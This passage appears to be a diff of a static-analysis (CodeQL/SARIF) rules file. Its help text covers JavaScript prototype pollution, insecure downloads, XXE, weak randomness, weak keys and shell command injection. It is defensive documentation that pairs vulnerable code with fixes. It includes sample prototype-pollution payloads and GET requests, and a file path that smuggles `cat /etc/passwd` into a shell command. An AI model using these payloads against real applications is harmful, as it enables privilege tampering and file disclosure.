- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. 
Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: 
[CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", - "markdown" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. 
Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: 
[CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], - "description" : "Functions recursively assigning properties on objects may be\n the cause of accidental modification of a built-in prototype object.", - "id" : "js/prototype-pollution-utility", - "kind" : "path-problem", - "name" : "Prototype-polluting function", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/prototype-pollution", - "name" : "js/prototype-pollution", - "shortDescription" : { - "text" : "Prototype-polluting merge call" - }, - "fullDescription" : { - "text" : "Recursively merging a user-controlled object into another object can allow an attacker to modify the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. 
An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. 
The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", - "markdown" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. 
Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. 
The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], - "description" : "Recursively merging a user-controlled object into another object\n can allow an attacker to modify the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", - "id" : "js/prototype-pollution", - "kind" : "path-problem", - "name" : "Prototype-polluting merge call", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/insecure-download", - "name" : "js/insecure-download", - 
"shortDescription" : { - "text" : "Download of sensitive file through insecure connection" - }, - "fullDescription" : { - "text" : "Downloading executables and other sensitive files over an insecure connection opens up for potential man-in-the-middle attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", - "markdown" : "# 
Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-829" ], - "description" : "Downloading executables and other sensitive files over an insecure connection\n opens up for potential man-in-the-middle attacks.", - "id" : "js/insecure-download", - "kind" : "path-problem", - "name" : "Download of sensitive file through insecure connection", - "precision" : "high", - 
"problem.severity" : "error", - "security-severity" : "8.1" - } - }, { - "id" : "js/xxe", - "name" : "js/xxe", - "shortDescription" : { - "text" : "XML external entity expansion" - }, - "fullDescription" : { - "text" : "Parsing user input as an XML document with external entity expansion is vulnerable to XXE attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. 
If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n", - "markdown" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. 
Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n" - }, - "properties" : { - "tags" : [ "security", 
"external/cwe/cwe-611", "external/cwe/cwe-827" ], - "description" : "Parsing user input as an XML document with external\n entity expansion is vulnerable to XXE attacks.", - "id" : "js/xxe", - "kind" : "path-problem", - "name" : "XML external entity expansion", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.1" - } - }, { - "id" : "js/insecure-randomness", - "name" : "js/insecure-randomness", - "shortDescription" : { - "text" : "Insecure randomness" - }, - "fullDescription" : { - "text" : "Using a cryptographically weak pseudo-random number generator to generate a security-sensitive value may allow an attacker to predict what value will be generated." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. 
Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n", - "markdown" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of 
random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. 
In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-338" ], - "description" : "Using a cryptographically weak pseudo-random number generator to generate a\n security-sensitive value may allow an attacker to predict what value will\n be generated.", - "id" : "js/insecure-randomness", - "kind" : "path-problem", - "name" : "Insecure randomness", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/insufficient-key-size", - "name" : "js/insufficient-key-size", - "shortDescription" : { - "text" : "Use of a weak cryptographic key" - }, - "fullDescription" : { - "text" : "Using a weak cryptographic key can allow an attacker to compromise security." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. 
As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n", - "markdown" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-326" ], - "description" : "Using a weak cryptographic key can allow an attacker to compromise security.", - "id" : 
"js/insufficient-key-size", - "kind" : "problem", - "name" : "Use of a weak cryptographic key", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/shell-command-injection-from-environment", - "name" : "js/shell-command-injection-from-environment", - "shortDescription" : { - "text" : "Shell command built from environment values" - }, - "fullDescription" : { - "text" : "Building a shell command string with values from the enclosing environment may cause subtle bugs or vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. 
Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. 
